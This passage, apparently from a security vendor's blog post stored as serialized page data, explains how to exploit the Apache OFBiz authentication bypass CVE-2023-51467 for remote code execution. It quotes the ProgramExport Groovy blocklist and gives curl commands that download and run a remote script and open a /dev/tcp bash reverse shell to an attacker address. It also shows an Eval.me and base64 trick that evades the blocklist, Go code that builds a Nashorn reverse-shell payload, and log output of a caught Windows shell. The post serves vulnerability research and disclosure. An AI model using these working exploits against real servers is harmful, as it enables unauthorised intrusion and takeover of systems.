",[47,82264,22852],{"href":82265,"rel":82266},"https:\u002F\u002Fattackerkb.com\u002Ftopics\u002Fin9sPR2Bzt\u002Fcve-2021-44228-log4shell\u002Frapid7-analysis",[51],[61,82268,82270],{"id":82269},"finding-an-rce-sink","Finding an RCE Sink",[18,82272,82273,82274,82279,82280,82284,82285,82290],{},"All that is to say, OFBiz has been exploited in the past, and it will be exploited in the future when the opportunity arises. This is why it only took a few days after the SonicWall disclosure for a couple of Chinese language blogs to suggest a ",[47,82275,82278],{"href":82276,"rel":82277},"https:\u002F\u002Fy4tacker.github.io\u002F2023\u002F12\u002F27\u002Fyear\u002F2023\u002F12\u002FApache-OFBiz%E6%9C%AA%E6%8E%88%E6%9D%83%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%B5%85%E6%9E%90-CVE-2023-51467\u002F",[51],"code execution endpoint",", and provide a ",[47,82281,11002],{"href":82282,"rel":82283},"https:\u002F\u002Fxz.aliyun.com\u002Ft\u002F13211",[51]," for command execution. The following image is from ",[47,82286,82289],{"href":82287,"rel":82288},"https:\u002F\u002Fxz.aliyun.com\u002Fu\u002F61082",[51],"RacerZ’s"," blog:",[18,82292,82293],{},[68,82294],{":width":10862,"alt":82295,"src":82296},"RacerZ proof of concept exploit for CVE-2023-51467","\u002Fblog\u002Fofbiz-cve-2023-51467\u002Fog-poc.png",[18,82298,82299,82300,82303,82304,82309,82310,82315],{},"As you can see, RacerZ was able to pop calc using the ",[886,82301,82302],{},"\u002Fwebtools\u002Fcontrol\u002FProgramExport"," endpoint alongside the authentication bypass (CVE-2023-51467). This endpoint executes ",[47,82305,82308],{"href":82306,"rel":82307},"https:\u002F\u002Fgroovy-lang.org\u002F",[51],"Groovy"," code provided by authenticated users. However, the endpoint is not intended to execute arbitrary Groovy. The code is passed through a blocklist of unacceptable values (which we’ll examine later). OFBiz developers appear to refer to this as a ",[47,82311,82314],{"href":82312,"rel":82313},"https:\u002F\u002Fissues.apache.org\u002Fjira\u002Fbrowse\u002FOFBIZ-12305",[51],"sandbox",", although that’s being a little liberal with the term. Either way, this “sandbox” is intended to prevent the uploading of webshells and other nefarious activities. This is, perhaps, why (before this blog) we haven’t seen a reverse shell or real weaponized exploit for this yet. Maybe the “sandbox” does its job?",[61,82317,82319],{"id":82318},"the-groovy-sandbox","The Groovy “Sandbox”",[18,82321,82322,82323,82328,82329,4606],{},"The “sandbox” blocks the ",[47,82324,82327],{"href":82325,"rel":82326},"https:\u002F\u002Fgithub.com\u002Fapache\u002Fofbiz-framework\u002Fblob\u002F9bd538be3eef75eba33ae1c40e88ba7f90b2bdce\u002Fframework\u002Fsecurity\u002Fconfig\u002Fsecurity.properties#L274",[51],"following strings"," from being included in the Groovy sent to ",[886,82330,82302],{},[1354,82332,82335],{"className":82333,"code":82334,"language":1359},[1357],"java.\nbeans\nfreemarker\n\u003Cscript\njavascript\n\u003Cbody\nbody\n\u003Cform\n\u003Cjsp:\n\u003Cc:out\ntaglib\n\u003Cprefix\n\u003C%@ page\n\u003C?php\nexec(\nalert(\n%eval\n@eval\neval(\nruntime\nimport\npassthru\nshell_exec\nassert\nstr_rot13\nsystem\ndecode\ninclude\npage\nchmod\nmkdir\nfopen\nfclose\nnew file\nupload\ngetfilename\ndownload\ngetoutputstring\nreadfile\niframe\nobject\nembed\nonload\nbuild\npython\nperl\n\u002Fperl\nruby\n\u002Fruby\nprocess\nfunction\nclass\nInputStream\nto_server\nwget\nstatic\nassign\nwebappPath\nifconfig\nroute\ncrontab\nnetstat\nuname\nhostname\niptables\nwhoami\n\"cmd\"\n*cmd|\n+cmd|\n=cmd|\nlocalhost\nthread\nrequire\ngzdeflate\n",[886,82336,82334],{"__ignoreMap":219},[18,82338,82339,82340,1246,82342,1246,82344,82346,82347,82349,82350,82352,82353,82356],{},"A lot of the entries are focused on webshells or individual commands (",[886,82341,22876],{},[886,82343,22814],{},[886,82345,1553],{},"). But there ",[1131,82348,1133],{}," two blocked items that are devastating to an attacker who just wants to execute arbitrary Groovy\u002FJava. That’s ",[886,82351,19043],{},", which prevents the attacker from importing any Java library, and ",[886,82354,82355],{},"java."," which prevents the attacker from using any Java classes that were auto-imported via Groovy.",[18,82358,82359,82360,82362,82363,82365],{},"This “sandbox” is not perfect, though. For example, they blocked ",[886,82361,1553],{}," but not ",[886,82364,1557],{},". An attacker that doesn’t mind touching disk can simply do the following:",[1354,82367,82369],{"className":31740,"code":82368,"language":2186,"meta":219,"style":219},"curl -kv -H \"Host: localhost:8443\" \\\n-d \"groovyProgram=x=new String[3];x[0]='bash';x[1]='-c';x[2]='curl http:\u002F\u002F10.9.49.131\u002Fpayload -o \u002Ftmp\u002Fx.sh; bash \u002Ftmp\u002Fx.sh';x.execute();\" \\\n\"https:\u002F\u002F10.9.49.121:8443\u002Fwebtools\u002Fcontrol\u002FProgramExport\u002F?requirePasswordChange=Y&PASSWORD=lobster&USERNAME=albino\"\n",[886,82370,82371,82390,82404],{"__ignoreMap":219},[1373,82372,82373,82375,82378,82381,82383,82386,82388],{"class":1375,"line":1376},[1373,82374,1557],{"class":2206},[1373,82376,82377],{"class":2209}," -kv",[1373,82379,82380],{"class":2209}," -H",[1373,82382,4883],{"class":1387},[1373,82384,82385],{"class":1391},"Host: localhost:8443",[1373,82387,183],{"class":1387},[1373,82389,76033],{"class":2326},[1373,82391,82392,82395,82397,82400,82402],{"class":1375,"line":220},[1373,82393,82394],{"class":4640},"-d ",[1373,82396,183],{"class":1387},[1373,82398,82399],{"class":1391},"groovyProgram=x=new String[3];x[0]='bash';x[1]='-c';x[2]='curl http:\u002F\u002F10.9.49.131\u002Fpayload -o \u002Ftmp\u002Fx.sh; bash \u002Ftmp\u002Fx.sh';x.execute();",[1373,82401,183],{"class":1387},[1373,82403,76033],{"class":2326},[1373,82405,82406,82408,82411],{"class":1375,"line":1266},[1373,82407,183],{"class":1387},[1373,82409,82410],{"class":1391},"https:\u002F\u002F10.9.49.121:8443\u002Fwebtools\u002Fcontrol\u002FProgramExport\u002F?requirePasswordChange=Y&PASSWORD=lobster&USERNAME=albino",[1373,82412,19057],{"class":1387},[18,82414,82415],{},"If the target is modern-ish Linux, you can easily get a bash reverse shell as well:",[1354,82417,82419],{"className":31740,"code":82418,"language":2186,"meta":219,"style":219},"curl -kv -H \"Host: localhost:8443\" \\\n-d \"groovyProgram=x=new String[3];x[0]='bash';x[1]='-c';x[2]='bash -i >%26 \u002Fdev\u002Ftcp\u002F10.9.49.131\u002F1270 0>%261;';x.execute();\" \\\n\"https:\u002F\u002F10.9.49.121:8443\u002Fwebtools\u002Fcontrol\u002FProgramExport\u002F?requirePasswordChange=Y&PASSWORD=lobster&USERNAME=albino\"\n",[886,82420,82421,82437,82450],{"__ignoreMap":219},[1373,82422,82423,82425,82427,82429,82431,82433,82435],{"class":1375,"line":1376},[1373,82424,1557],{"class":2206},[1373,82426,82377],{"class":2209},[1373,82428,82380],{"class":2209},[1373,82430,4883],{"class":1387},[1373,82432,82385],{"class":1391},[1373,82434,183],{"class":1387},[1373,82436,76033],{"class":2326},[1373,82438,82439,82441,82443,82446,82448],{"class":1375,"line":220},[1373,82440,82394],{"class":4640},[1373,82442,183],{"class":1387},[1373,82444,82445],{"class":1391},"groovyProgram=x=new String[3];x[0]='bash';x[1]='-c';x[2]='bash -i >%26 \u002Fdev\u002Ftcp\u002F10.9.49.131\u002F1270 0>%261;';x.execute();",[1373,82447,183],{"class":1387},[1373,82449,76033],{"class":2326},[1373,82451,82452,82454,82456],{"class":1375,"line":1266},[1373,82453,183],{"class":1387},[1373,82455,82410],{"class":1391},[1373,82457,19057],{"class":1387},[18,82459,82460],{},"For an advanced attacker, though, these payloads aren’t ideal. They touch disk and rely on Linux-specific behavior. It’s important to note that OFBiz can also run on Windows, so any payload that doesn’t account for that is sort of half-cocked. A better solution would support both Windows and Linux and avoid touching system files. Essentially, a Java-based solution would be ideal. But as we talked about above, the sandbox is fairly effective at blocking Java, so we have to find a way around the block list.",[61,82462,82464],{"id":82463},"bypassing-the-groovy-sandbox","Bypassing the Groovy “Sandbox”",[18,82466,82467,82468,1255,82470,82472,82473,82475,82476,82481,82482,1246,82485,1246,82488,1255,82491,82494,82495,1246,82498,1255,82501,82504,82505,82508],{},"To execute arbitrary Java, we need to overcome the inability to use ",[886,82469,19043],{},[886,82471,82355],{}," It’s pretty standard to hide exploit code in a different encoding (e.g. base64), but the blocklist also blocks ",[886,82474,27659],{},", so we are in sort of a rough spot to start out.\nLuckily, OFBiz does not block the ",[47,82477,82480],{"href":82478,"rel":82479},"https:\u002F\u002Fdocs.groovy-lang.org\u002Flatest\u002Fhtml\u002Fapi\u002Fgroovy\u002Futil\u002FEval.html",[51],"groovy.util.Eval"," functions. ",[886,82483,82484],{},"Eval.me",[886,82486,82487],{},"Eval.x",[886,82489,82490],{},"Eval.xy",[886,82492,82493],{},"Eval.xyz"," are all available because the OFBiz blocks only prevent ",[886,82496,82497],{},"%eval",[886,82499,82500],{},"@eval",[886,82502,82503],{},"eval(",". That means that we can build a string and then execute it using one of the ",[886,82506,82507],{},"Eval"," functions.",[18,82510,82511,82512,82515],{},"Consider the following examples. The first example just demonstrates how ",[886,82513,82514],{},"decodeBase64()"," is used in Groovy.",[1354,82517,82521],{"className":82518,"code":82519,"language":82520,"meta":219,"style":219},"language-groovy shiki shiki-themes material-theme-lighter github-light github-dark monokai","println(new String('aGVsbG8gd29ybGQh'.decodeBase64()))\n","groovy",[886,82522,82523],{"__ignoreMap":219},[1373,82524,82525,82528,82530,82532,82534,82536,82538,82541,82543,82545,82548,82550],{"class":1375,"line":1376},[1373,82526,82527],{"class":1379},"println",[1373,82529,1384],{"class":4640},[1373,82531,15523],{"class":4636},[1373,82533,27253],{"class":7293},[1373,82535,1384],{"class":4640},[1373,82537,1388],{"class":1387},[1373,82539,82540],{"class":1391},"aGVsbG8gd29ybGQh",[1373,82542,1388],{"class":1387},[1373,82544,59],{"class":1397},[1373,82546,82547],{"class":4640},"decodeBase64",[1373,82549,7514],{"class":1383},[1373,82551,16761],{"class":4640},[18,82553,82554,82555,982,82557,82562,82563,31686],{},"The above code would be blocked by OFBiz. However, using ",[886,82556,82484],{},[47,82558,82561],{"href":82559,"rel":82560},"http:\u002F\u002Fgroovy-lang.org\u002Fsyntax.html#_string_interpolation",[51],"string interpolation"," we can execute the equivalent code (both print ",[886,82564,82565],{},"hello world!",[1354,82567,82569],{"className":82518,"code":82568,"language":82520,"meta":219,"style":219},"x=\"'aGVsbG8gd29ybGQh'.de\"\nprintln(new String(Eval.me(\"${x}codeBase64()\")))\n",[886,82570,82571,82585],{"__ignoreMap":219},[1373,82572,82573,82576,82578,82580,82583],{"class":1375,"line":1376},[1373,82574,82575],{"class":4640},"x",[1373,82577,5417],{"class":1397},[1373,82579,183],{"class":1387},[1373,82581,82582],{"class":1391},"'aGVsbG8gd29ybGQh'.de",[1373,82584,19057],{"class":1387},[1373,82586,82587,82589,82591,82593,82595,82597,82599,82601,82604,82606,82608,82612,82615,82617,82620,82622,82624],{"class":1375,"line":220},[1373,82588,82527],{"class":1379},[1373,82590,1384],{"class":4640},[1373,82592,15523],{"class":4636},[1373,82594,27253],{"class":7293},[1373,82596,1384],{"class":4640},[1373,82598,82507],{"class":7293},[1373,82600,59],{"class":1397},[1373,82602,82603],{"class":4640},"me",[1373,82605,1384],{"class":1383},[1373,82607,183],{"class":1387},[1373,82609,82611],{"class":82610},"slF1C","${",[1373,82613,82575],{"class":82614},"s-euU",[1373,82616,28575],{"class":82610},[1373,82618,82619],{"class":1391},"codeBase64()",[1373,82621,183],{"class":1387},[1373,82623,2230],{"class":1383},[1373,82625,16761],{"class":4640},[18,82627,82628,82629,82631,82632,82634],{},"OFBiz doesn’t see ",[886,82630,27659],{}," because we split the string and then used string interpolation to recombine the statement in the ",[886,82633,82484],{}," method. In this way, we can execute any Groovy\u002FJava that we want because we can hide anything in the base64 encoded data. The question is, what do we want to use for a payload?",[61,82636,82638],{"id":82637},"nashorn-reverse-shell","Nashorn Reverse Shell",[18,82640,82641,82642,82647,82648,10515,82653,82658],{},"If your goal is to execute a bespoke implant only from memory, there are no good options for Java. It’s entirely possible, and ",[47,82643,82646],{"href":82644,"rel":82645},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-javapayload\u002Fblob\u002Fmaster\u002Fjavapayload\u002Fsrc\u002Fmain\u002Fjava\u002Fjavapayload\u002Fstage\u002FMeterpreter.java",[51],"Java Meterpeter"," comes very close, but ultimately ",[47,82649,82652],{"href":82650,"rel":82651},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-payloads\u002Fblob\u002F6143148e22337c7b2ff93aeb67e492022bb148f8\u002Fjava\u002Fjavapayload\u002Fsrc\u002Fmain\u002Fjava\u002Fmetasploit\u002FPayload.java#L101",[51],"touches",[47,82654,82657],{"href":82655,"rel":82656},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-payloads\u002Fblob\u002F6143148e22337c7b2ff93aeb67e492022bb148f8\u002Fjava\u002Fjavapayload\u002Fsrc\u002Fmain\u002Fjava\u002Fmetasploit\u002FPayload.java#L83",[51],"disk",". So any type of “in memory only” attacks have to be custom developed.",[18,82660,82661,82662,82665,82666,82669],{},"However, if you are willing to spawn processes from ",[886,82663,82664],{},"java.exe",", then a Nashorn reverse shell is a good bespoke in-memory payload. ",[47,82667,74241],{"href":74239,"rel":82668},[51]," is (was) the JavaScript engine in Java, so it can execute arbitrary JavaScript (with Java extensions - similar to Groovy) without being compiled to Java bytecode. That means we can provide the JavaScript\u002FJava as a string as part of our exploit - a pretty ideal situation.",[18,82671,82672],{},"Invoking Nashorn in Groovy\u002FJava is easy.",[1354,82674,82676],{"className":27194,"code":82675,"language":27196,"meta":219,"style":219},"import javax.script.*;\n\nScriptEngineManager factory = new ScriptEngineManager();\nScriptEngine engine = factory.getEngineByName(\"nashorn\");\ntry {\n engine.eval(\"print('hello world')\");\n}\ncatch (final ScriptException se) {\n se.printStackTrace();\n}\n",[886,82677,82678,82697,82701,82718,82747,82754,82774,82778,82798,82809],{"__ignoreMap":219},[1373,82679,82680,82682,82686,82689,82691,82693,82695],{"class":1375,"line":1376},[1373,82681,19043],{"class":5387},[1373,82683,82685],{"class":82684},"sAzHV"," javax",[1373,82687,59],{"class":82688},"sW3yT",[1373,82690,8249],{"class":82684},[1373,82692,59],{"class":82688},[1373,82694,35613],{"class":6761},[1373,82696,4912],{"class":1383},[1373,82698,82699],{"class":1375,"line":220},[1373,82700,6520],{"emptyLinePlaceholder":237},[1373,82702,82703,82706,82709,82711,82713,82716],{"class":1375,"line":1266},[1373,82704,82705],{"class":27228},"ScriptEngineManager",[1373,82707,82708],{"class":4640}," factory ",[1373,82710,5417],{"class":1397},[1373,82712,15283],{"class":4636},[1373,82714,82715],{"class":7297}," ScriptEngineManager",[1373,82717,15603],{"class":1383},[1373,82719,82720,82723,82726,82728,82731,82733,82736,82738,82740,82743,82745],{"class":1375,"line":1852},[1373,82721,82722],{"class":27228},"ScriptEngine",[1373,82724,82725],{"class":4640}," engine ",[1373,82727,5417],{"class":1397},[1373,82729,82730],{"class":4640}," factory",[1373,82732,59],{"class":1383},[1373,82734,82735],{"class":7297},"getEngineByName",[1373,82737,1384],{"class":1383},[1373,82739,183],{"class":1387},[1373,82741,82742],{"class":1391},"nashorn",[1373,82744,183],{"class":1387},[1373,82746,4680],{"class":1383},[1373,82748,82749,82752],{"class":1375,"line":4692},[1373,82750,82751],{"class":4636},"try",[1373,82753,4765],{"class":1383},[1373,82755,82756,82759,82761,82763,82765,82767,82770,82772],{"class":1375,"line":4724},[1373,82757,82758],{"class":4640}," engine",[1373,82760,59],{"class":1383},[1373,82762,1380],{"class":7297},[1373,82764,1384],{"class":1383},[1373,82766,183],{"class":1387},[1373,82768,82769],{"class":1391},"print('hello world')",[1373,82771,183],{"class":1387},[1373,82773,4680],{"class":1383},[1373,82775,82776],{"class":1375,"line":4756},[1373,82777,1855],{"class":1383},[1373,82779,82780,82783,82785,82788,82791,82794,82796],{"class":1375,"line":4768},[1373,82781,82782],{"class":4636},"catch",[1373,82784,4641],{"class":1383},[1373,82786,82787],{"class":4652},"final",[1373,82789,82790],{"class":27228}," ScriptException",[1373,82792,82793],{"class":19096}," se",[1373,82795,2230],{"class":1383},[1373,82797,4765],{"class":1383},[1373,82799,82800,82803,82805,82807],{"class":1375,"line":4792},[1373,82801,82802],{"class":4640}," se",[1373,82804,59],{"class":1383},[1373,82806,28056],{"class":7297},[1373,82808,15603],{"class":1383},[1373,82810,82811],{"class":1375,"line":4798},[1373,82812,1855],{"class":1383},[18,82814,82815,82816,82820],{},"The above prints out “hello world”. VulnCheck’s ",[47,82817,20558],{"href":82818,"rel":82819},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fblob\u002F4512b2abf38a5dff19d8f07da028ee01bbb01c9a\u002Fpayload\u002Freverse.go#L81",[51]," framework implements a complete Nashorn (or jjs) reverse shell that supports encryption and automatically detects if the victim host is using Windows or Linux.",[18,82822,82823,82824,82829,82830,82833],{},"We’ve shared an ",[47,82825,82828],{"href":82826,"rel":82827},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fcve-2023-51467",[51],"exploit on GitHub"," that uses ",[47,82831,20558],{"href":14297,"rel":82832},[51]," to exploit the OFBiz authentication bypass, bypass the blocklist, and then lands a Nashorn payload for a reverse shell. The bulk of the payload generation is fairly trivial:",[1354,82835,82837],{"className":19022,"code":82836,"language":19024,"meta":219,"style":219},"nashorn := fmt.Sprintf(`import javax.script.*;\n\n ScriptEngineManager factory = new ScriptEngineManager();\n ScriptEngine engine = factory.getEngineByName(\"nashorn\");\n try {\n engine.eval(new java.lang.String(java.util.Base64.decoder.decode(\"%s\")));\n } catch (final ScriptException se) { se.printStackTrace(); }`, payload.ReverseShellJJSScript(conf.Lhost, conf.Lport, true))\n\ngroovyPayload := fmt.Sprintf(`groovyProgram=x=\"'%s'.de\";Eval.me(new String(Eval.me(\"${x}codeBase64()\")));`, b64.StdEncoding.EncodeToString([]byte(nashorn)))\n",[886,82838,82839,82861,82865,82870,82875,82880,82890,82928,82932],{"__ignoreMap":219},[1373,82840,82841,82844,82846,82849,82851,82854,82856,82858],{"class":1375,"line":1376},[1373,82842,82843],{"class":4640},"nashorn ",[1373,82845,20584],{"class":1397},[1373,82847,82848],{"class":4640}," fmt",[1373,82850,59],{"class":1383},[1373,82852,82853],{"class":7297},"Sprintf",[1373,82855,1384],{"class":1383},[1373,82857,19169],{"class":1387},[1373,82859,82860],{"class":1391},"import javax.script.*;\n",[1373,82862,82863],{"class":1375,"line":220},[1373,82864,6520],{"emptyLinePlaceholder":237},[1373,82866,82867],{"class":1375,"line":1266},[1373,82868,82869],{"class":1391}," ScriptEngineManager factory = new ScriptEngineManager();\n",[1373,82871,82872],{"class":1375,"line":1852},[1373,82873,82874],{"class":1391}," ScriptEngine engine = factory.getEngineByName(\"nashorn\");\n",[1373,82876,82877],{"class":1375,"line":4692},[1373,82878,82879],{"class":1391}," try {\n",[1373,82881,82882,82885,82887],{"class":1375,"line":4724},[1373,82883,82884],{"class":1391}," engine.eval(new java.lang.String(java.util.Base64.decoder.decode(\"",[1373,82886,38048],{"class":37971},[1373,82888,82889],{"class":1391},"\")));\n",[1373,82891,82892,82895,82897,82899,82901,82903,82906,82908,82910,82912,82914,82916,82918,82920,82922,82924,82926],{"class":1375,"line":4756},[1373,82893,82894],{"class":1391}," } catch (final ScriptException se) { se.printStackTrace(); }",[1373,82896,19169],{"class":1387},[1373,82898,5437],{"class":1383},[1373,82900,37845],{"class":4640},[1373,82902,59],{"class":1383},[1373,82904,82905],{"class":7297},"ReverseShellJJSScript",[1373,82907,1384],{"class":1383},[1373,82909,38107],{"class":4640},[1373,82911,59],{"class":1383},[1373,82913,38239],{"class":4640},[1373,82915,5437],{"class":1383},[1373,82917,20633],{"class":4640},[1373,82919,59],{"class":1383},[1373,82921,38248],{"class":4640},[1373,82923,5437],{"class":1383},[1373,82925,14986],{"class":14985},[1373,82927,16761],{"class":1383},[1373,82929,82930],{"class":1375,"line":4768},[1373,82931,6520],{"emptyLinePlaceholder":237},[1373,82933,82934,82937,82939,82941,82943,82945,82947,82949,82952,82954,82957,82959,82961,82964,82966,82969,82971,82974,82977,82980,82982,82984],{"class":1375,"line":4792},[1373,82935,82936],{"class":4640},"groovyPayload ",[1373,82938,20584],{"class":1397},[1373,82940,82848],{"class":4640},[1373,82942,59],{"class":1383},[1373,82944,82853],{"class":7297},[1373,82946,1384],{"class":1383},[1373,82948,19169],{"class":1387},[1373,82950,82951],{"class":1391},"groovyProgram=x=\"'",[1373,82953,38048],{"class":37971},[1373,82955,82956],{"class":1391},"'.de\";Eval.me(new String(Eval.me(\"${x}codeBase64()\")));",[1373,82958,19169],{"class":1387},[1373,82960,5437],{"class":1383},[1373,82962,82963],{"class":4640}," b64",[1373,82965,59],{"class":1383},[1373,82967,82968],{"class":4640},"StdEncoding",[1373,82970,59],{"class":1383},[1373,82972,82973],{"class":7297},"EncodeToString",[1373,82975,82976],{"class":1383},"([]",[1373,82978,82979],{"class":7293},"byte",[1373,82981,1384],{"class":1383},[1373,82983,82742],{"class":4640},[1373,82985,82986],{"class":1383},")))\n",[18,82988,82989],{},"Throwing it an OFBiz install on Windows generates the following shell.",[1354,82991,82993],{"className":31740,"code":82992,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2023-51467$ .\u002Fbuild\u002Fcve-2023-51467_linux-arm64 -a -e -rhost 10.9.49.99 -rport 8443 -lhost 10.9.49.131 -lport 1270\ntime=2024-01-08T15:08:25.984-05:00 level=STATUS msg=\"Certificate not provided. Generating a TLS Certificate\"\ntime=2024-01-08T15:08:26.239-05:00 level=STATUS msg=\"Starting TLS listener on 10.9.49.131:1270\"\ntime=2024-01-08T15:08:26.239-05:00 level=STATUS msg=\"Starting target\" index=0 host=10.9.49.99 port=8443 ssl=false \"ssl auto\"=true\ntime=2024-01-08T15:08:26.271-05:00 level=STATUS msg=\"Sending an SSL reverse shell payload for port 10.9.49.131:1270\"\ntime=2024-01-08T15:08:26.271-05:00 level=STATUS msg=\"Throwing exploit at https:\u002F\u002F10.9.49.99:8443\u002Fwebtools\u002Fcontrol\u002FProgramExport\u002F\"\ntime=2024-01-08T15:08:27.753-05:00 level=SUCCESS msg=\"Caught new shell from 10.9.49.99:53519\"\ntime=2024-01-08T15:08:27.754-05:00 level=STATUS msg=\"Active shell from 10.9.49.99:53519\"\n\nMicrosoft Windows [Version 10.0.22000.2416]\n(c) Microsoft Corporation. All rights reserved.\n\nC:\\Users\\albinolobster\\Downloads\\apache-ofbiz-18.12.10\\apache-ofbiz-18.12.10>whoami\nwhoami\nalbinolobst9bd8\\albinolobster\n",[886,82994,82995,83026,83051,83077,83136,83162,83187,83213,83239,83243,83254,83272,83276,83285,83289],{"__ignoreMap":219},[1373,82996,82997,83000,83003,83005,83007,83009,83012,83014,83017,83019,83022,83024],{"class":1375,"line":1376},[1373,82998,82999],{"class":2206},"albinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2023-51467$",[1373,83001,83002],{"class":1391}," .\u002Fbuild\u002Fcve-2023-51467_linux-arm64",[1373,83004,74504],{"class":2209},[1373,83006,38907],{"class":2209},[1373,83008,38910],{"class":2209},[1373,83010,83011],{"class":5467}," 10.9.49.99",[1373,83013,45568],{"class":2209},[1373,83015,83016],{"class":5467}," 8443",[1373,83018,38916],{"class":2209},[1373,83020,83021],{"class":5467}," 10.9.49.131",[1373,83023,38922],{"class":2209},[1373,83025,38925],{"class":5467},[1373,83027,83028,83030,83032,83035,83037,83039,83041,83043,83045,83047,83049],{"class":1375,"line":220},[1373,83029,38930],{"class":4640},[1373,83031,5417],{"class":1397},[1373,83033,83034],{"class":1391},"2024-01-08T15:08:25.984-05:00",[1373,83036,38938],{"class":4640},[1373,83038,5417],{"class":1397},[1373,83040,38943],{"class":1391},[1373,83042,38946],{"class":4640},[1373,83044,5417],{"class":1397},[1373,83046,183],{"class":1387},[1373,83048,45631],{"class":1391},[1373,83050,19057],{"class":1387},[1373,83052,83053,83055,83057,83060,83062,83064,83066,83068,83070,83072,83075],{"class":1375,"line":1266},[1373,83054,38930],{"class":4640},[1373,83056,5417],{"class":1397},[1373,83058,83059],{"class":1391},"2024-01-08T15:08:26.239-05:00",[1373,83061,38938],{"class":4640},[1373,83063,5417],{"class":1397},[1373,83065,38943],{"class":1391},[1373,83067,38946],{"class":4640},[1373,83069,5417],{"class":1397},[1373,83071,183],{"class":1387},[1373,83073,83074],{"class":1391},"Starting TLS listener on 10.9.49.131:1270",[1373,83076,19057],{"class":1387},[1373,83078,83079,83081,83083,83085,83087,83089,83091,83093,83095,83097,83099,83101,83103,83105,83107,83109,83111,83114,83116,83118,83121,83123,83125,83127,83129,83131,83133],{"class":1375,"line":1852},[1373,83080,38930],{"class":4640},[1373,83082,5417],{"class":1397},[1373,83084,83059],{"class":1391},[1373,83086,38938],{"class":4640},[1373,83088,5417],{"class":1397},[1373,83090,38943],{"class":1391},[1373,83092,38946],{"class":4640},[1373,83094,5417],{"class":1397},[1373,83096,183],{"class":1387},[1373,83098,38979],{"class":1391},[1373,83100,183],{"class":1387},[1373,83102,38984],{"class":4640},[1373,83104,5417],{"class":1397},[1373,83106,445],{"class":1391},[1373,83108,38991],{"class":4640},[1373,83110,5417],{"class":1397},[1373,83112,83113],{"class":1391},"10.9.49.99",[1373,83115,38999],{"class":4640},[1373,83117,5417],{"class":1397},[1373,83119,83120],{"class":1391},"8443",[1373,83122,39007],{"class":4640},[1373,83124,5417],{"class":1397},[1373,83126,5971],{"class":1391},[1373,83128,4883],{"class":1387},[1373,83130,39016],{"class":1391},[1373,83132,183],{"class":1387},[1373,83134,83135],{"class":1391},"=true\n",[1373,83137,83138,83140,83142,83145,83147,83149,83151,83153,83155,83157,83160],{"class":1375,"line":4692},[1373,83139,38930],{"class":4640},[1373,83141,5417],{"class":1397},[1373,83143,83144],{"class":1391},"2024-01-08T15:08:26.271-05:00",[1373,83146,38938],{"class":4640},[1373,83148,5417],{"class":1397},[1373,83150,38943],{"class":1391},[1373,83152,38946],{"class":4640},[1373,83154,5417],{"class":1397},[1373,83156,183],{"class":1387},[1373,83158,83159],{"class":1391},"Sending an SSL reverse shell payload for port 10.9.49.131:1270",[1373,83161,19057],{"class":1387},[1373,83163,83164,83166,83168,83170,83172,83174,83176,83178,83180,83182,83185],{"class":1375,"line":4724},[1373,83165,38930],{"class":4640},[1373,83167,5417],{"class":1397},[1373,83169,83144],{"class":1391},[1373,83171,38938],{"class":4640},[1373,83173,5417],{"class":1397},[1373,83175,38943],{"class":1391},[1373,83177,38946],{"class":4640},[1373,83179,5417],{"class":1397},[1373,83181,183],{"class":1387},[1373,83183,83184],{"class":1391},"Throwing exploit at https:\u002F\u002F10.9.49.99:8443\u002Fwebtools\u002Fcontrol\u002FProgramExport\u002F",[1373,83186,19057],{"class":1387},[1373,83188,83189,83191,83193,83196,83198,83200,83202,83204,83206,83208,83211],{"class":1375,"line":4756},[1373,83190,38930],{"class":4640},[1373,83192,5417],{"class":1397},[1373,83194,83195],{"class":1391},"2024-01-08T15:08:27.753-05:00",[1373,83197,38938],{"class":4640},[1373,83199,5417],{"class":1397},[1373,83201,39062],{"class":1391},[1373,83203,38946],{"class":4640},[1373,83205,5417],{"class":1397},[1373,83207,183],{"class":1387},[1373,83209,83210],{"class":1391},"Caught new shell from 10.9.49.99:53519",[1373,83212,19057],{"class":1387},[1373,83214,83215,83217,83219,83222,83224,83226,83228,83230,83232,83234,83237],{"class":1375,"line":4768},[1373,83216,38930],{"class":4640},[1373,83218,5417],{"class":1397},[1373,83220,83221],{"class":1391},"2024-01-08T15:08:27.754-05:00",[1373,83223,38938],{"class":4640},[1373,83225,5417],{"class":1397},[1373,83227,38943],{"class":1391},[1373,83229,38946],{"class":4640},[1373,83231,5417],{"class":1397},[1373,83233,183],{"class":1387},[1373,83235,83236],{"class":1391},"Active shell from 10.9.49.99:53519",[1373,83238,19057],{"class":1387},[1373,83240,83241],{"class":1375,"line":4792},[1373,83242,6520],{"emptyLinePlaceholder":237},[1373,83244,83245,83247,83249,83251],{"class":1375,"line":4798},[1373,83246,3129],{"class":2206},[1373,83248,46306],{"class":1391},[1373,83250,46309],{"class":4640},[1373,83252,83253],{"class":1391},"10.0.22000.2416]\n",[1373,83255,83256,83258,83260,83262,83264,83266,83268,83270],{"class":1375,"line":4806},[1373,83257,1384],{"class":1383},[1373,83259,28578],{"class":2206},[1373,83261,2230],{"class":1383},[1373,83263,46326],{"class":2206},[1373,83265,46329],{"class":1391},[1373,83267,46332],{"class":1391},[1373,83269,46335],{"class":1391},[1373,83271,46338],{"class":1391},[1373,83273,83274],{"class":1375,"line":4817},[1373,83275,6520],{"emptyLinePlaceholder":237},[1373,83277,83278,83281,83283],{"class":1375,"line":4825},[1373,83279,83280],{"class":2206},"C:\\Users\\albinolobster\\Downloads\\apache-ofbiz-18.12.10\\apache-ofbiz-18.12.10",[1373,83282,5384],{"class":4640},[1373,83284,35556],{"class":1391},[1373,83286,83287],{"class":1375,"line":4835},[1373,83288,35556],{"class":2206},[1373,83290,83291],{"class":1375,"line":4843},[1373,83292,83293],{"class":2206},"albinolobst9bd8\\albinolobster\n",[18,83295,83296,83297,83299],{},"Of course, executing ",[886,83298,22876],{}," spawns cmd.exe and, if you believe Twitter, will cause the EDR teams to come running.",[18,83301,83302],{},[68,83303],{":width":10862,"alt":83304,"src":83305},"whoami generated by 